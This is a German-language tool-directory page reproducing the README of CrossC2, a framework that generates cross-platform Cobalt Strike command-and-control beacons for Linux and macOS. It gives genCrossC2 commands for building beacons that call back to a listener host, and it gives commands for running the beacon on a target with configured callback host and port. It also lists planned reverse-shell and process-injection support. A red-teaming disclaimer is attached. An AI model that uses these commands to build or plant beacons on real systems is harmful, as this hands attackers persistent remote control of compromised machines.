Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CrossC2 — CobaltStrikes plattformübergreifende Nutzlast generieren | Kitploit
Tools/GitHubGitHub/gloxec/crossc2
Penetrationstest-FrameworksExploit-FrameworksPayload-GenerierungPost-ExploitationCommand and ControlRed TeamingPayload-Entwicklung
GitHubgloxec/crossc2

CrossC2

CobaltStrikes plattformübergreifende Nutzlast generieren

Repository anzeigen
2.6k374vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CrossC2-Framework

Linux macOS GitHub issues-closed Release Downloads

CrossC2-Logo

README | 中文文档 | README_FULL | 中文完整文档

CobaltStrike-Unterstützung

Unterstützt die Sicherheitsbewertung anderer Plattformen (Linux/MacOS/...) mittels CobaltStrike und umfasst die Entwicklungsunterstützung für Unix-Post-Penetrationsmodule

2023-07-31 16.56.51

Verwendung

  1. Herunterladen

Laden Sie CrossC2.cna genCrossC2 CrossC2Kit herunter und ändern Sie die CrossC2.cna-Konfiguration.

  1. Listener erstellen und Schlüssel kopieren
  • Erstellen Sie einen windows/beacon_https/reverse_https-Listener
  • Kopieren Sie .cobaltstrike.beacon_keys aus dem Teamserver-Verzeichnis nach lokal
  1. Funktionserweiterung
  • Fügen Sie CrossC2Kit_Loader.cna hinzu, inklusive Speicherladung und anderer Funktionen.
  • Bei der cs4.x-Version fehlen die Dateiverwaltung und die Prozesslistenfunktion. Sie müssen diesen Loader verwenden, um neu zu starten.
  1. Beacon generieren

Verwenden Sie standardmäßig die GUI-Funktion, die von cli oder cna bereitgestellt wird, um den Beacon zu generieren.

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

ex:

root@kitploit:~
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. specify the BEACON of the custom protocol dynamic library
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. specify the C2Profile that needs to be automatically parsed
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

Erweiterte Konfigurationen finden Sie in der Dokumentation: 📄Referenz

  1. Beacon ausführen
  • Führen Sie das vom CrossC2-Plugin generierte Ein-Klick-Online-Skript auf dem Ziel aus.
  • Nach dem Hochladen des Beacons auf das Zielgerät zur berechtigten Ausführung.
  • Legen Sie das Arbeitsverzeichnis für den Beacon fest und führen Sie aus: export CCPATH=/opt/ && /tmp/c2
  • Legen Sie vorübergehend die Protokollbibliothek für den Beacon fest und führen Sie aus: /tmp/c2 /tmp/c2-rebind.so
  • Legen Sie vorübergehend die C2-Konfiguration für den Beacon fest: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Setzen Sie DEBUG, um den Online-Status des Beacons anzuzeigen: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit ist eine auf der Unix-Plattform basierende Infiltrationserweiterung, die von CrossC2 abgeleitet ist. Es nutzt die Aggressor Script Open-Source-Skript-Engine. Es kann verwendet werden, um Automatisierungen zu erstellen, die den Betriebsprozess des Red Teams simulieren und den CobaltStrike-Client erweitern.

CrossC2Kit erbt die ursprünglichen Funktionen von CobaltStrike, daher beziehen sich die Entwicklungs- und Schreibgrammatik weiterhin auf die offizielle Dokumentation: https://trial.cobaltstrike.com/aggressor-script/index.html

Es bietet jedoch einige API-Erweiterungen auf Basis von CrossC2, um den Beacon der Unix-Plattform zu steuern

API: 📄Referenz

Demo: CrossC2_action2

Hinweis

Nur zur internen Verwendung durch Unternehmen und Organisationen. Dieses Framework weist eine gewisse Instabilität auf. Nicht-Professionelle dürfen es nicht verwenden. Niemand darf es für illegale Zwecke oder zur Gewinnerzielung nutzen. Darüber hinaus ist die Veröffentlichung einer nicht autorisierten modifizierten Version ebenfalls untersagt; andernfalls werden rechtliche Konsequenzen getragen.

Todo

  1. Unterstützung für HTTP-Proxy (Authentifizierung) und SOCKS-Proxy-Rückverbindung
  2. Node-Beacon? (Einzelner Knotentyp, kann andere Beacons hosten, ohne auf einen Teamserver angewiesen zu sein)
  3. Reverse-Shell-Unterstützung für so/dylib auf Linux & macOS sowie davon abgeleitete Prozessinjektionsfunktionen

Danke

Dank an @Emma für das für CrossC2 entworfene Logo, das im Stil der Armitage- und CobaltStrike-Serie gestaltet ist.

Tool herunterladen
CS3.14(Fehlerbehebungen)CS4.0CS4.X (4.1~4.8)
Master-Branch✅
cs4.0-Branch✅
cs4.1-Branch✅
Release-Seite <= v2.1✅
Release-Seite >= v2.2✅